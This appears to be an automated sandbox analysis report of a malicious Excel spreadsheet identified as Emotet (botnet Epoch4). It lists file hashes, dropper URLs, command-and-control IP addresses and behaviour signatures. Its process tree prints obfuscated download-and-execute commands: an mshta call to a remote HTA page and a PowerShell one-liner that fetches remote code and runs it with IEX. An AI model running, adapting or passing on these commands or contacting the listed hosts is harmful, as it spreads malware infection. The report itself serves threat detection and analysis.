Overview

overview

10

Static

static

8

70caf460cf...65.xls

windows7_x64

10

70caf460cf...65.xls

windows10-2004_x64

10

Analysis

  • max time kernel
    134s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    20-01-2022 18:11

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    70caf460cf0c000b71bd37cc9e8d3065.xls

  • Size

    142KB

  • MD5

    70caf460cf0c000b71bd37cc9e8d3065

  • SHA1

    d5cf4d2edfc7466a0292cec8e435839ee139bd7d

  • SHA256

    4627d88cb27d885555625326c40717630dbfc7708869fdde4d0064f2d59e5bb4

  • SHA512

    7d23f1f84fca0a9b99e745e29c7529bb85dba3a7a7f158cfecaac7d25a55d1a03ce8c4603a13bc3be11c07f6059776ba3938b9af18317b938d1d9e8142b026bf

Score
10/10
emotetepoch4bankerpersistencetrojan

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0xb907d607/fer/fer.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://185.7.214.7/fer/fer.png

Extracted

Family

emotet

Botnet

Epoch4

C2

131.100.24.231:80

209.59.138.75:7080

103.8.26.103:8080

51.38.71.0:443

212.237.17.99:8080

79.172.212.216:8080

207.38.84.195:8080

104.168.155.129:8080

178.79.147.66:8080

46.55.222.11:443

103.8.26.102:8080

192.254.71.210:443

45.176.232.124:443

203.114.109.124:443

51.68.175.8:8080

58.227.42.236:80

45.142.114.231:8080

217.182.143.207:443

178.63.25.185:443

45.118.115.99:8080
eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

    trojanbankeremotet
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs
    persistence
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 4 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 41 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\70caf460cf0c000b71bd37cc9e8d3065.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3968
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1912
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fer.html
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1064
        • C:\Windows\system32\mshta.exe
          mshta http://0xb907d607/fer/fer.html
          3⤵
          • Blocklisted process makes network request
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:3544
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fer.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3696
            • C:\Windows\system32\cmd.exe
              "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3992
              • C:\Windows\SysWow64\rundll32.exe
                C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
                6⤵
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:1976
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                  7⤵
                  • Loads dropped DLL
                  • Drops file in System32 directory
                  • Suspicious use of WriteProcessMemory
                  PID:1604
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xyrnmcdy\xrcfzomyhxw.jga",NaHqOuSvAVJXo
                    8⤵
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:3924
                    • C:\Windows\SysWOW64\rundll32.exe
                      C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Xyrnmcdy\xrcfzomyhxw.jga",DllRegisterServer
                      9⤵
                      • Blocklisted process makes network request
                      • Loads dropped DLL
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2184
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -u -p 3544 -s 1724
            4⤵
            • Program crash
            • Checks processor information in registry
            • Enumerates system info in registry
            • Suspicious behavior: EnumeratesProcesses
            PID:996
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p
      1⤵
        PID:640
      • C:\Windows\System32\WaaSMedicAgent.exe
        C:\Windows\System32\WaaSMedicAgent.exe ff9cc5e03793f17992823208008fb8d2 mXXzQROENkiGuBKPD0WKJg.0.1.0.0.0
        1⤵
        • Modifies data under HKEY_USERS
        PID:2132
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k PrintWorkflow
        1⤵
          PID:1264
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -pss -s 420 -p 3544 -ip 3544
          1⤵
          • Suspicious use of NtCreateProcessExOtherParentProcess
          • Suspicious use of WriteProcessMemory
          PID:4032
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k wusvcs -p
          1⤵
            PID:1320

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • memory/1604-557-0x0000000004500000-0x0000000004526000-memory.dmp

            Filesize

            152KB

            Download

          • memory/1604-554-0x0000000003F30000-0x0000000003F56000-memory.dmp

            Filesize

            152KB

            Download

          • memory/1976-551-0x0000000004A70000-0x0000000004A96000-memory.dmp

            Filesize

            152KB

            Download

          • memory/2184-577-0x0000000005110000-0x0000000005136000-memory.dmp

            Filesize

            152KB

            Download

          • memory/2184-583-0x0000000005410000-0x0000000005436000-memory.dmp

            Filesize

            152KB

            Download

          • memory/2184-575-0x00000000050B0000-0x00000000050D6000-memory.dmp

            Filesize

            152KB

            Download

          • memory/2184-579-0x0000000005280000-0x00000000052A6000-memory.dmp

            Filesize

            152KB

            Download

          • memory/2184-571-0x00000000031C0000-0x00000000031E6000-memory.dmp

            Filesize

            152KB

            Download

          • memory/2184-581-0x00000000052E0000-0x0000000005306000-memory.dmp

            Filesize

            152KB

            Download

          • memory/2184-585-0x00000000054F0000-0x0000000005516000-memory.dmp

            Filesize

            152KB

            Download

          • memory/3696-532-0x000002B73A5C0000-0x000002B73A5C2000-memory.dmp

            Filesize

            8KB

            Download

          • memory/3696-533-0x000002B73A5C3000-0x000002B73A5C5000-memory.dmp

            Filesize

            8KB

            Download

          • memory/3696-556-0x000002B73AB60000-0x000002B73ABD6000-memory.dmp

            Filesize

            472KB

            Download

          • memory/3696-530-0x000002B722300000-0x000002B722322000-memory.dmp

            Filesize

            136KB

            Download

          • memory/3696-536-0x000002B73A740000-0x000002B73A784000-memory.dmp

            Filesize

            272KB

            Download

          • memory/3696-534-0x000002B73A5C6000-0x000002B73A5C8000-memory.dmp

            Filesize

            8KB

            Download

          • memory/3924-567-0x00000000028C0000-0x00000000028E6000-memory.dmp

            Filesize

            152KB

            Download

          • memory/3968-137-0x00007FFB9ED60000-0x00007FFB9ED70000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3968-131-0x00007FFBA13D0000-0x00007FFBA13E0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3968-132-0x00007FFBA13D0000-0x00007FFBA13E0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3968-130-0x00007FFBA13D0000-0x00007FFBA13E0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3968-133-0x00007FFBA13D0000-0x00007FFBA13E0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3968-134-0x00007FFBA13D0000-0x00007FFBA13E0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3968-138-0x00007FFB9ED60000-0x00007FFB9ED70000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3968-605-0x00007FFBA13D0000-0x00007FFBA13E0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3968-606-0x00007FFBA13D0000-0x00007FFBA13E0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3968-607-0x00007FFBA13D0000-0x00007FFBA13E0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3968-608-0x00007FFBA13D0000-0x00007FFBA13E0000-memory.dmp

            Filesize

            64KB

            Download